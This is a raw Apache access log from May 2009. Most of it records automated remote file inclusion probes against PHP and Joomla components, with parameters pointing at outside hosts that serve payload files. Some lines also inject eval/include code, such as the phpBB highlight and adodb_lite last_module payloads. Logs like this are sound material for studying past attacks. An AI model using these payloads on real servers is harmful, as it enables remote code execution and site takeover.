218.150.79.146 - - [16/May/2009:02:37:41 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:37:41 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:37:45 -0400] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:37:45 -0400] "GET //?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:37:45 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:37:47 -0400] "GET /logs/access_log.Q108052400%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:02:37:59 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.150.79.146 - - [16/May/2009:02:37:59 -0400] "GET /logs/access_log.Q108060200%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:38:12 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:38:16 -0400] "GET /logs/access_log.Q108112100%20//?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.813"
195.34.78.110 - - [16/May/2009:02:39:14 -0400] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [16/May/2009:02:39:14 -0400] "GET /logs/access_log.Q108082200/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [16/May/2009:02:39:15 -0400] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [16/May/2009:02:39:19 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:02:39:22 -0400] "GET /logs/access_log.Q109032000%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:39:24 -0400] "GET /logs/access_log.Q108072900//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:39:24 -0400] "GET /logs/access_log.Q108112900//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:02:39:43 -0400] "GET /logs/access_log.Q108081900%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:39:53 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:39:53 -0400] "GET /logs/access_log.Q109012300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:39:53 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:40:46 -0400] "GET /logs/access_log.Q108100900%20%20//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:02:41:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [16/May/2009:02:41:24 -0400] "GET /logs/access_log.Q108082200%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:02:41:40 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:02:41:40 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:02:41:40 -0400] "GET /logs/access_log.Q109032000//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:02:41:49 -0400] "GET /logs/access_log.Q108081900//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.34.78.110 - - [16/May/2009:02:42:01 -0400] "GET /logs/access_log.Q108072300%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:02:42:48 -0400] "GET /logs/access_log.Q109022600//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:42:48 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:42:48 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:43:21 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:43:39 -0400] "GET /logs/access_log.Q109022600//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:43:39 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:43:39 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
72.52.230.168 - - [16/May/2009:02:43:48 -0400] "GET /phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:43:52 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:43:52 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:43:57 -0400] "GET /phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:43:57 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:43:57 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:43:58 -0400] "GET /logs/access_log.Q108102600/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:44:00 -0400] "GET /phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:44:00 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:44:00 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:44:00 -0400] "GET /logs/access_log.Q108102600/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:44:02 -0400] "GET /phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:44:02 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:44:02 -0400] "GET /logs/access_log.Q108090100%20%20/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:44:03 -0400] "GET /logs/access_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:02:44:03 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
193.221.119.126 - - [16/May/2009:02:44:26 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:44:26 -0400] "GET /logs/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:44:26 -0400] "GET /phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:44:30 -0400] "GET /logs/access_log.Q108090100%20%20/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:44:30 -0400] "GET /logs/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:44:30 -0400] "GET /logs/access_log.Q108102600/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:44:30 -0400] "GET /phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:44:34 -0400] "GET /logs/access_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:45:43 -0400] "GET /phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:45:43 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:45:43 -0400] "GET /logs/error_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:02:45:46 -0400] "GET /logs/access_log.Q109032000%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:02:45:46 -0400] "GET /logs/access_log.Q108081900%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:45:56 -0400] "GET /logs/access_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:46:00 -0400] "GET /phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:46:04 -0400] "GET /logs/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:46:04 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:46:14 -0400] "GET /phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:46:16 -0400] "GET //imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:46:16 -0400] "GET /logs//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:46:16 -0400] "GET /logs/access_log.Q108081600//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:46:18 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:46:18 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:46:20 -0400] "GET //imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:46:21 -0400] "GET /logs//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:46:21 -0400] "GET /logs/access_log.Q108081600//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:02:46:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
171.64.75.45 - - [16/May/2009:02:46:23 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:46:23 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:46:23 -0400] "GET /logs/access_log.Q108081600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:02:46:37 -0400] "GET /logs/access_log.Q108082900/phphtml.php?htmlclass_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:46:43 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:46:43 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:46:43 -0400] "GET /logs/access_log.Q108081600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:47:03 -0400] "GET /logs/access_log.Q108082900/phphtml.php?htmlclass_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:47:17 -0400] "GET /logs/access_log.Q108081600%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:47:24 -0400] "GET /logs/access_log.Q108081600%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:02:48:05 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:02:48:05 -0400] "GET /logs/access_log.Q108081600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:02:48:07 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:48:35 -0400] "GET /logs//imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:48:35 -0400] "GET //imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:48:35 -0400] "GET /logs/access_log.Q108081600//imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:49:04 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:49:04 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:49:04 -0400] "GET /logs/access_log.Q108081600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:49:16 -0400] "GET /logs/access_log.Q109042500%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:49:25 -0400] "GET /logs/access_log.Q109042500%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:49:29 -0400] "GET /logs/access_log.Q109022600//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:49:29 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:49:30 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
193.25.197.14 - - [16/May/2009:02:49:44 -0400] "GET //imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:02:49:44 -0400] "GET /logs/access_log.Q108081600//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:02:49:45 -0400] "GET /logs//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:50:04 -0400] "GET /logs/access_log.Q108081600%20%20//imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:50:04 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
78.137.163.133 - - [16/May/2009:02:50:08 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "-"
78.137.163.133 - - [16/May/2009:02:50:08 -0400] "GET /logs/error_log.Q108080800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
121.254.229.131 - - [16/May/2009:02:50:20 -0400] "GET /logs/access_log.Q108081600%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:02:50:22 -0400] "GET /logs/error_log.Q108012300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.164.18 - - [16/May/2009:02:50:38 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
217.18.76.16 - - [16/May/2009:02:50:38 -0400] "GET /logs/access_log.Q108100600//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:50:38 -0400] "GET //component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
72.30.79.49 - - [16/May/2009:02:50:38 -0400] "GET /logs/error_log.Q107072100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.18.76.16 - - [16/May/2009:02:50:38 -0400] "GET /logs//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
74.52.164.18 - - [16/May/2009:02:50:39 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:50:42 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:50:42 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:50:43 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:50:43 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.811"
72.52.230.168 - - [16/May/2009:02:50:54 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
